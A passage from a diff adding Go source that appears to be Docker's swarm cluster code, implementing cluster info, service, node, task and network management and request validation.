+		advertiseHost, _, _ := net.SplitHostPort(c.node.config.AdvertiseAddr)
+		return advertiseHost
+	}
+	return c.actualLocalAddr
+}
+
+// GetRemoteAddress returns a known advertise address of a remote manager if
+// available.
+// todo: change to array/connect with info
+func (c *Cluster) GetRemoteAddress() string {
+	c.RLock()
+	defer c.RUnlock()
+	return c.getRemoteAddress()
+}
+
+func (c *Cluster) getRemoteAddress() string {
+	if c.node == nil {
+		return ""
+	}
+	nodeID := c.node.NodeID()
+	for _, r := range c.node.Remotes() {
+		if r.NodeID != nodeID {
+			return r.Addr
+		}
+	}
+	return ""
+}
+
+// ListenClusterEvents returns a channel that receives messages on cluster
+// participation changes.
+// todo: make cancelable and accessible to multiple callers
+func (c *Cluster) ListenClusterEvents() <-chan struct{} {
+	return c.configEvent
+}
+
+// Info returns information about the current cluster state.
+func (c *Cluster) Info() types.Info {
+	info := types.Info{
+		NodeAddr: c.GetAdvertiseAddress(),
+	}
+
+	c.RLock()
+	defer c.RUnlock()
+
+	if c.node == nil {
+		info.LocalNodeState = types.LocalNodeStateInactive
+		if c.cancelDelay != nil {
+			info.LocalNodeState = types.LocalNodeStateError
+		}
+		if c.locked {
+			info.LocalNodeState = types.LocalNodeStateLocked
+		} else if c.err == ErrSwarmCertificatesExpired {
+			info.LocalNodeState = types.LocalNodeStateError
+		}
+	} else {
+		info.LocalNodeState = types.LocalNodeStatePending
+		if c.ready == true {
+			info.LocalNodeState = types.LocalNodeStateActive
+		} else if c.locked {
+			info.LocalNodeState = types.LocalNodeStateLocked
+		}
+	}
+	if c.err != nil {
+		info.Error = c.err.Error()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	if c.isActiveManager() {
+		info.ControlAvailable = true
+		swarm, err := c.Inspect()
+		if err != nil {
+			info.Error = err.Error()
+		}
+
+		// Strip JoinTokens
+		info.Cluster = swarm.ClusterInfo
+
+		if r, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err == nil {
+			info.Nodes = len(r.Nodes)
+			for _, n := range r.Nodes {
+				if n.ManagerStatus != nil {
+					info.Managers = info.Managers + 1
+				}
+			}
+		}
+	}
+
+	if c.node != nil {
+		for _, r := range c.node.Remotes() {
+			info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr})
+		}
+		info.NodeID = c.node.NodeID()
+	}
+
+	return info
+}
+
+// isActiveManager should not be called without a read lock
+func (c *Cluster) isActiveManager() bool {
+	return c.node != nil && c.conn != nil
+}
+
+// swarmExists should not be called without a read lock
+func (c *Cluster) swarmExists() bool {
+	return c.node != nil || c.locked || c.err == ErrSwarmCertificatesExpired
+}
+
+// errNoManager returns error describing why manager commands can't be used.
+// Call with read lock.
+func (c *Cluster) errNoManager() error {
+	if c.node == nil {
+		if c.locked {
+			return ErrSwarmLocked
+		}
+		if c.err == ErrSwarmCertificatesExpired {
+			return ErrSwarmCertificatesExpired
+		}
+		return fmt.Errorf("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.")
+	}
+	if c.node.Manager() != nil {
+		return fmt.Errorf("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster.")
+	}
+	return fmt.Errorf("This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager.")
+}
+
+// GetServices returns all services of a managed swarm cluster.
+func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return nil, c.errNoManager()
+	}
+
+	filters, err := newListServicesFilters(options.Filters)
+	if err != nil {
+		return nil, err
+	}
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := c.client.ListServices(
+		ctx,
+		&swarmapi.ListServicesRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	services := []types.Service{}
+
+	for _, service := range r.Services {
+		services = append(services, convert.ServiceFromGRPC(*service))
+	}
+
+	return services, nil
+}
+
+// imageWithDigestString takes an image such as name or name:tag
+// and returns the image pinned to a digest, such as name@sha256:34234...
+// Due to the difference between the docker/docker/reference, and the
+// docker/distribution/reference packages, we're parsing the image twice.
+// As the two packages converge, this function should be simplified.
+// TODO(nishanttotla): After the packages converge, the function must
+// convert distreference.Named -> distreference.Canonical, and the logic simplified.
+func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) {
+	if _, err := digest.ParseDigest(image); err == nil {
+		return "", errors.New("image reference is an image ID")
+	}
+	ref, err := distreference.ParseNamed(image)
+	if err != nil {
+		return "", err
+	}
+	// only query registry if not a canonical reference (i.e. with digest)
+	if _, ok := ref.(distreference.Canonical); !ok {
+		// create a docker/docker/reference Named object because GetRepository needs it
+		dockerRef, err := reference.ParseNamed(image)
+		if err != nil {
+			return "", err
+		}
+		dockerRef = reference.WithDefaultTag(dockerRef)
+		namedTaggedRef, ok := dockerRef.(reference.NamedTagged)
+		if !ok {
+			return "", fmt.Errorf("unable to cast image to NamedTagged reference object")
+		}
+
+		repo, _, err := c.config.Backend.GetRepository(ctx, namedTaggedRef, authConfig)
+		if err != nil {
+			return "", err
+		}
+		dscrptr, err := repo.Tags(ctx).Get(ctx, namedTaggedRef.Tag())
+		if err != nil {
+			return "", err
+		}
+
+		namedDigestedRef, err := distreference.WithDigest(distreference.EnsureTagged(ref), dscrptr.Digest)
+		if err != nil {
+			return "", err
+		}
+		return namedDigestedRef.String(), nil
+	}
+	// reference already contains a digest, so just return it
+	return ref.String(), nil
+}
+
+// CreateService creates a new service in a managed swarm cluster.
+func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string) (*apitypes.ServiceCreateResponse, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return nil, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	err := c.populateNetworkID(ctx, c.client, &s)
+	if err != nil {
+		return nil, err
+	}
+
+	serviceSpec, err := convert.ServiceSpecToGRPC(s)
+	if err != nil {
+		return nil, err
+	}
+
+	ctnr := serviceSpec.Task.GetContainer()
+	if ctnr == nil {
+		return nil, fmt.Errorf("service does not use container tasks")
+	}
+
+	if encodedAuth != "" {
+		ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth}
+	}
+
+	// retrieve auth config from encoded auth
+	authConfig := &apitypes.AuthConfig{}
+	if encodedAuth != "" {
+		if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil {
+			logrus.Warnf("invalid authconfig: %v", err)
+		}
+	}
+
+	resp := &apitypes.ServiceCreateResponse{}
+
+	// pin image by digest
+	if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" {
+		digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig)
+		if err != nil {
+			logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error())
+			resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", ctnr.Image, err.Error()))
+		} else if ctnr.Image != digestImage {
+			logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage)
+			ctnr.Image = digestImage
+		} else {
+			logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image)
+		}
+	}
+
+	r, err := c.client.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec})
+	if err != nil {
+		return nil, err
+	}
+
+	resp.ID = r.Service.ID
+	return resp, nil
+}
+
+// GetService returns a service based on an ID or name.
+func (c *Cluster) GetService(input string) (types.Service, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return types.Service{}, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	service, err := getService(ctx, c.client, input)
+	if err != nil {
+		return types.Service{}, err
+	}
+	return convert.ServiceFromGRPC(*service), nil
+}
+
+// UpdateService updates existing service to match new properties.
+func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, encodedAuth string, registryAuthFrom string) (*apitypes.ServiceUpdateResponse, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return nil, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	err := c.populateNetworkID(ctx, c.client, &spec)
+	if err != nil {
+		return nil, err
+	}
+
+	serviceSpec, err := convert.ServiceSpecToGRPC(spec)
+	if err != nil {
+		return nil, err
+	}
+
+	currentService, err := getService(ctx, c.client, serviceIDOrName)
+	if err != nil {
+		return nil, err
+	}
+
+	newCtnr := serviceSpec.Task.GetContainer()
+	if newCtnr == nil {
+		return nil, fmt.Errorf("service does not use container tasks")
+	}
+
+	if encodedAuth != "" {
+		newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth}
+	} else {
+		// this is needed because if the encodedAuth isn't being updated then we
+		// shouldn't lose it, and continue to use the one that was already present
+		var ctnr *swarmapi.ContainerSpec
+		switch registryAuthFrom {
+		case apitypes.RegistryAuthFromSpec, "":
+			ctnr = currentService.Spec.Task.GetContainer()
+		case apitypes.RegistryAuthFromPreviousSpec:
+			if currentService.PreviousSpec == nil {
+				return nil, fmt.Errorf("service does not have a previous spec")
+			}
+			ctnr = currentService.PreviousSpec.Task.GetContainer()
+		default:
+			return nil, fmt.Errorf("unsupported registryAuthFromValue")
+		}
+		if ctnr == nil {
+			return nil, fmt.Errorf("service does not use container tasks")
+		}
+		newCtnr.PullOptions = ctnr.PullOptions
+		// update encodedAuth so it can be used to pin image by digest
+		if ctnr.PullOptions != nil {
+			encodedAuth = ctnr.PullOptions.RegistryAuth
+		}
+	}
+
+	// retrieve auth config from encoded auth
+	authConfig := &apitypes.AuthConfig{}
+	if encodedAuth != "" {
+		if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil {
+			logrus.Warnf("invalid authconfig: %v", err)
+		}
+	}
+
+	resp := &apitypes.ServiceUpdateResponse{}
+
+	// pin image by digest
+	if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" {
+		digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig)
+		if err != nil {
+			logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error())
+			resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error()))
+		} else if newCtnr.Image != digestImage {
+			logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage)
+			newCtnr.Image = digestImage
+		} else {
+			logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image)
+		}
+	}
+
+	_, err = c.client.UpdateService(
+		ctx,
+		&swarmapi.UpdateServiceRequest{
+			ServiceID: currentService.ID,
+			Spec:      &serviceSpec,
+			ServiceVersion: &swarmapi.Version{
+				Index: version,
+			},
+		},
+	)
+
+	return resp, err
+}
+
+// RemoveService removes a service from a managed swarm cluster.
+func (c *Cluster) RemoveService(input string) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	service, err := getService(ctx, c.client, input)
+	if err != nil {
+		return err
+	}
+
+	if _, err := c.client.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID}); err != nil {
+		return err
+	}
+	return nil
+}
+
+// ServiceLogs collects service logs and writes them back to `config.OutStream`
+func (c *Cluster) ServiceLogs(ctx context.Context, input string, config *backend.ContainerLogsConfig, started chan struct{}) error {
+	c.RLock()
+	if !c.isActiveManager() {
+		c.RUnlock()
+		return c.errNoManager()
+	}
+
+	service, err := getService(ctx, c.client, input)
+	if err != nil {
+		c.RUnlock()
+		return err
+	}
+
+	stream, err := c.logs.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{
+		Selector: &swarmapi.LogSelector{
+			ServiceIDs: []string{service.ID},
+		},
+		Options: &swarmapi.LogSubscriptionOptions{
+			Follow: config.Follow,
+		},
+	})
+	if err != nil {
+		c.RUnlock()
+		return err
+	}
+
+	wf := ioutils.NewWriteFlusher(config.OutStream)
+	defer wf.Close()
+	close(started)
+	wf.Flush()
+
+	outStream := stdcopy.NewStdWriter(wf, stdcopy.Stdout)
+	errStream := stdcopy.NewStdWriter(wf, stdcopy.Stderr)
+
+	// Release the lock before starting the stream.
+	c.RUnlock()
+	for {
+		// Check the context before doing anything.
+		select {
+		case <-ctx.Done():
+			return ctx.Err()
+		default:
+		}
+
+		subscribeMsg, err := stream.Recv()
+		if err == io.EOF {
+			return nil
+		}
+		if err != nil {
+			return err
+		}
+
+		for _, msg := range subscribeMsg.Messages {
+			data := []byte{}
+
+			if config.Timestamps {
+				ts, err := ptypes.Timestamp(msg.Timestamp)
+				if err != nil {
+					return err
+				}
+				data = append(data, []byte(ts.Format(logger.TimeFormat)+" ")...)
+			}
+
+			data = append(data, []byte(fmt.Sprintf("%s.node.id=%s,%s.service.id=%s,%s.task.id=%s ",
+				contextPrefix, msg.Context.NodeID,
+				contextPrefix, msg.Context.ServiceID,
+				contextPrefix, msg.Context.TaskID,
+			))...)
+
+			data = append(data, msg.Data...)
+
+			switch msg.Stream {
+			case swarmapi.LogStreamStdout:
+				outStream.Write(data)
+			case swarmapi.LogStreamStderr:
+				errStream.Write(data)
+			}
+		}
+	}
+}
+
+// GetNodes returns a list of all nodes known to a cluster.
+func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return nil, c.errNoManager()
+	}
+
+	filters, err := newListNodesFilters(options.Filters)
+	if err != nil {
+		return nil, err
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := c.client.ListNodes(
+		ctx,
+		&swarmapi.ListNodesRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	nodes := []types.Node{}
+
+	for _, node := range r.Nodes {
+		nodes = append(nodes, convert.NodeFromGRPC(*node))
+	}
+	return nodes, nil
+}
+
+// GetNode returns a node based on an ID or name.
+func (c *Cluster) GetNode(input string) (types.Node, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return types.Node{}, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	node, err := getNode(ctx, c.client, input)
+	if err != nil {
+		return types.Node{}, err
+	}
+	return convert.NodeFromGRPC(*node), nil
+}
+
+// UpdateNode updates existing nodes properties.
+func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	nodeSpec, err := convert.NodeSpecToGRPC(spec)
+	if err != nil {
+		return err
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	currentNode, err := getNode(ctx, c.client, input)
+	if err != nil {
+		return err
+	}
+
+	_, err = c.client.UpdateNode(
+		ctx,
+		&swarmapi.UpdateNodeRequest{
+			NodeID: currentNode.ID,
+			Spec:   &nodeSpec,
+			NodeVersion: &swarmapi.Version{
+				Index: version,
+			},
+		},
+	)
+	return err
+}
+
+// RemoveNode removes a node from a cluster
+func (c *Cluster) RemoveNode(input string, force bool) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	node, err := getNode(ctx, c.client, input)
+	if err != nil {
+		return err
+	}
+
+	if _, err := c.client.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force}); err != nil {
+		return err
+	}
+	return nil
+}
+
+// GetTasks returns a list of tasks matching the filter options.
+func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return nil, c.errNoManager()
+	}
+
+	byName := func(filter filters.Args) error {
+		if filter.Include("service") {
+			serviceFilters := filter.Get("service")
+			for _, serviceFilter := range serviceFilters {
+				service, err := c.GetService(serviceFilter)
+				if err != nil {
+					return err
+				}
+				filter.Del("service", serviceFilter)
+				filter.Add("service", service.ID)
+			}
+		}
+		if filter.Include("node") {
+			nodeFilters := filter.Get("node")
+			for _, nodeFilter := range nodeFilters {
+				node, err := c.GetNode(nodeFilter)
+				if err != nil {
+					return err
+				}
+				filter.Del("node", nodeFilter)
+				filter.Add("node", node.ID)
+			}
+		}
+		return nil
+	}
+
+	filters, err := newListTasksFilters(options.Filters, byName)
+	if err != nil {
+		return nil, err
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := c.client.ListTasks(
+		ctx,
+		&swarmapi.ListTasksRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	tasks := []types.Task{}
+
+	for _, task := range r.Tasks {
+		if task.Spec.GetContainer() != nil {
+			tasks = append(tasks, convert.TaskFromGRPC(*task))
+		}
+	}
+	return tasks, nil
+}
+
+// GetTask returns a task by an ID.
+func (c *Cluster) GetTask(input string) (types.Task, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return types.Task{}, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	task, err := getTask(ctx, c.client, input)
+	if err != nil {
+		return types.Task{}, err
+	}
+	return convert.TaskFromGRPC(*task), nil
+}
+
+// GetNetwork returns a cluster network by an ID.
+func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return apitypes.NetworkResource{}, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	network, err := getNetwork(ctx, c.client, input)
+	if err != nil {
+		return apitypes.NetworkResource{}, err
+	}
+	return convert.BasicNetworkFromGRPC(*network), nil
+}
+
+func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return nil, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := c.client.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	var networks []apitypes.NetworkResource
+
+	for _, network := range r.Networks {
+		networks = append(networks, convert.BasicNetworkFromGRPC(*network))
+	}
+
+	return networks, nil
+}
+
+// GetNetworks returns all current cluster managed networks.
+func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) {
+	return c.getNetworks(nil)
+}
+
+// GetNetworksByName returns cluster managed networks by name.
+// It is ok to have multiple networks here. #18864
+func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) {
+	// Note that swarmapi.GetNetworkRequest.Name is not functional.
+	// So we cannot just use that with c.GetNetwork.
+	return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{
+		Names: []string{name},
+	})
+}
+
+func attacherKey(target, containerID string) string {
+	return containerID + ":" + target
+}
+
+// UpdateAttachment signals the attachment config to the attachment
+// waiter who is trying to start or attach the container to the
+// network.
+func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error {
+	c.RLock()
+	attacher, ok := c.attachers[attacherKey(target, containerID)]
+	c.RUnlock()
+	if !ok || attacher == nil {
+		return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target)
+	}
+
+	attacher.attachWaitCh <- config
+	close(attacher.attachWaitCh)
+	return nil
+}
+
+// WaitForDetachment waits for the container to stop or detach from
+// the network.
+func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error {
+	c.RLock()
+	attacher, ok := c.attachers[attacherKey(networkName, containerID)]
+	if !ok {
+		attacher, ok = c.attachers[attacherKey(networkID, containerID)]
+	}
+	if c.node == nil || c.node.Agent() == nil {
+		c.RUnlock()
+		return fmt.Errorf("invalid cluster node while waiting for detachment")
+	}
+
+	agent := c.node.Agent()
+	c.RUnlock()
+
+	if ok && attacher != nil &&
+		attacher.detachWaitCh != nil &&
+		attacher.attachCompleteCh != nil {
+		// Attachment may be in progress still so wait for
+		// attachment to complete.
+		select {
+		case <-attacher.attachCompleteCh:
+		case <-ctx.Done():
+			return ctx.Err()
+		}
+
+		if attacher.taskID == taskID {
+			select {
+			case <-attacher.detachWaitCh:
+			case <-ctx.Done():
+				return ctx.Err()
+			}
+		}
+	}
+
+	return agent.ResourceAllocator().DetachNetwork(ctx, taskID)
+}
+
+// AttachNetwork generates an attachment request towards the manager.
+func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) {
+	aKey := attacherKey(target, containerID)
+	c.Lock()
+	if c.node == nil || c.node.Agent() == nil {
+		c.Unlock()
+		return nil, fmt.Errorf("invalid cluster node while attaching to network")
+	}
+	if attacher, ok := c.attachers[aKey]; ok {
+		c.Unlock()
+		return attacher.config, nil
+	}
+
+	agent := c.node.Agent()
+	attachWaitCh := make(chan *network.NetworkingConfig)
+	detachWaitCh := make(chan struct{})
+	attachCompleteCh := make(chan struct{})
+	c.attachers[aKey] = &attacher{
+		attachWaitCh:     attachWaitCh,
+		attachCompleteCh: attachCompleteCh,
+		detachWaitCh:     detachWaitCh,
+	}
+	c.Unlock()
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses)
+	if err != nil {
+		c.Lock()
+		delete(c.attachers, aKey)
+		c.Unlock()
+		return nil, fmt.Errorf("Could not attach to network %s: %v", target, err)
+	}
+
+	c.Lock()
+	c.attachers[aKey].taskID = taskID
+	close(attachCompleteCh)
+	c.Unlock()
+
+	logrus.Debugf("Successfully attached to network %s with tid %s", target, taskID)
+
+	var config *network.NetworkingConfig
+	select {
+	case config = <-attachWaitCh:
+	case <-ctx.Done():
+		return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err())
+	}
+
+	c.Lock()
+	c.attachers[aKey].config = config
+	c.Unlock()
+	return config, nil
+}
+
+// DetachNetwork unblocks the waiters waiting on WaitForDetachment so
+// that a request to detach can be generated towards the manager.
+func (c *Cluster) DetachNetwork(target string, containerID string) error {
+	aKey := attacherKey(target, containerID)
+
+	c.Lock()
+	attacher, ok := c.attachers[aKey]
+	delete(c.attachers, aKey)
+	c.Unlock()
+
+	if !ok {
+		return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target)
+	}
+
+	close(attacher.detachWaitCh)
+	return nil
+}
+
+// CreateNetwork creates a new cluster managed network.
+func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return "", c.errNoManager()
+	}
+
+	if runconfig.IsPreDefinedNetwork(s.Name) {
+		err := fmt.Errorf("%s is a pre-defined network and cannot be created", s.Name)
+		return "", apierrors.NewRequestForbiddenError(err)
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	networkSpec := convert.BasicNetworkCreateToGRPC(s)
+	r, err := c.client.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec})
+	if err != nil {
+		return "", err
+	}
+
+	return r.Network.ID, nil
+}
+
+// RemoveNetwork removes a cluster network.
+func (c *Cluster) RemoveNetwork(input string) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	network, err := getNetwork(ctx, c.client, input)
+	if err != nil {
+		return err
+	}
+
+	if _, err := c.client.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID}); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error {
+	// Always prefer NetworkAttachmentConfigs from TaskTemplate
+	// but fallback to service spec for backward compatibility
+	networks := s.TaskTemplate.Networks
+	if len(networks) == 0 {
+		networks = s.Networks
+	}
+
+	for i, n := range networks {
+		apiNetwork, err := getNetwork(ctx, client, n.Target)
+		if err != nil {
+			if ln, _ := c.config.Backend.FindNetwork(n.Target); ln != nil && !ln.Info().Dynamic() {
+				err = fmt.Errorf("The network %s cannot be used with services. Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name())
+				return apierrors.NewRequestForbiddenError(err)
+			}
+			return err
+		}
+		networks[i].Target = apiNetwork.ID
+	}
+	return nil
+}
+
+func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) {
+	// GetNetwork to match via full ID.
+	rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input})
+	if err != nil {
+		// If any error (including NotFound), ListNetworks to match via ID prefix and full name.
+		rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{Names: []string{input}}})
+		if err != nil || len(rl.Networks) == 0 {
+			rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{IDPrefixes: []string{input}}})
+		}
+
+		if err != nil {
+			return nil, err
+		}
+
+		if len(rl.Networks) == 0 {
+			return nil, fmt.Errorf("network %s not found", input)
+		}
+
+		if l := len(rl.Networks); l > 1 {
+			return nil, fmt.Errorf("network %s is ambiguous (%d matches found)", input, l)
+		}
+
+		return rl.Networks[0], nil
+	}
+	return rg.Network, nil
+}
+
+// Cleanup stops active swarm node. This is run before daemon shutdown.
+func (c *Cluster) Cleanup() {
+	c.Lock()
+	node := c.node
+	if node == nil {
+		c.Unlock()
+		return
+	}
+	defer c.Unlock()
+	if c.isActiveManager() {
+		active, reachable, unreachable, err := c.managerStats()
+		if err == nil {
+			singlenode := active && isLastManager(reachable, unreachable)
+			if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) {
+				logrus.Errorf("Leaving cluster with %v managers left out of %v. Raft quorum will be lost.", reachable-1, reachable+unreachable)
+			}
+		}
+	}
+	c.stopNode()
+}
+
+func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, err error) {
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	nodes, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{})
+	if err != nil {
+		return false, 0, 0, err
+	}
+	for _, n := range nodes.Nodes {
+		if n.ManagerStatus != nil {
+			if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_REACHABLE {
+				reachable++
+				if n.ID == c.node.NodeID() {
+					current = true
+				}
+			}
+			if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_UNREACHABLE {
+				unreachable++
+			}
+		}
+	}
+	return
+}
+
+func validateAndSanitizeInitRequest(req *types.InitRequest) error {
+	var err error
+	req.ListenAddr, err = validateAddr(req.ListenAddr)
+	if err != nil {
+		return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err)
+	}
+
+	if req.Spec.Annotations.Name == "" {
+		req.Spec.Annotations.Name = "default"
+	} else if req.Spec.Annotations.Name != "default" {
+		return errors.New(`swarm spec must be named "default"`)
+	}
+
+	return nil
+}
+
+func validateAndSanitizeJoinRequest(req *types.JoinRequest) error {
+	var err error
+	req.ListenAddr, err = validateAddr(req.ListenAddr)
+	if err != nil {
+		return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err)
+	}
+	if len(req.RemoteAddrs) == 0 {
+		return fmt.Errorf("at least 1 RemoteAddr is required to join")
+	}
+	for i := range req.RemoteAddrs {
+		req.RemoteAddrs[i], err = validateAddr(req.RemoteAddrs[i])
+		if err != nil {
+			return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err)
+		}
+	}
+	return nil
+}
+
+func validateAddr(addr string) (string, error) {
+	if addr == "" {
+		return addr, fmt.Errorf("invalid empty address")
+	}
+	newaddr, err := opts.ParseTCPAddr(addr, defaultAddr)
+	if err != nil {
+		return addr, nil
+	}
+	return strings.TrimPrefix(newaddr, "tcp://"), nil
+}
+
+func initClusterSpec(node *node, spec types.Spec) error {
+	ctx, _ := context.WithTimeout(context.Background(), 5*time.Second)
+	for conn := range node.ListenControlSocket(ctx) {
+		if ctx.Err() != nil {
+			return ctx.Err()
+		}
+		if conn != nil {
+			client := swarmapi.NewControlClient(conn)
+			var cluster *swarmapi.Cluster
+			for i := 0; ; i++ {
+				lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{})
+				if err != nil {
+					return fmt.Errorf("error on listing clusters: %v", err)
+				}
+				if len(lcr.Clusters) == 0 {
+					if i < 10 {
+						time.Sleep(200 * time.Millisecond)
+						continue
+					}
+					return fmt.Errorf("empty list of clusters was returned")
+				}
+				cluster = lcr.Clusters[0]
+				break
+			}
+			// In init, we take the initial default values from swarmkit, and merge
+			// any non nil or 0 value from spec to GRPC spec. This will leave the
+			// default value alone.
+			// Note that this is different from Update(), as in Update() we expect
+			// user to specify the complete spec of the cluster (as they already know
+			// the existing one and knows which field to update)
+			clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec)
+			if err != nil {
+				return fmt.Errorf("error updating cluster settings: %v", err)
+			}
+			_, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{
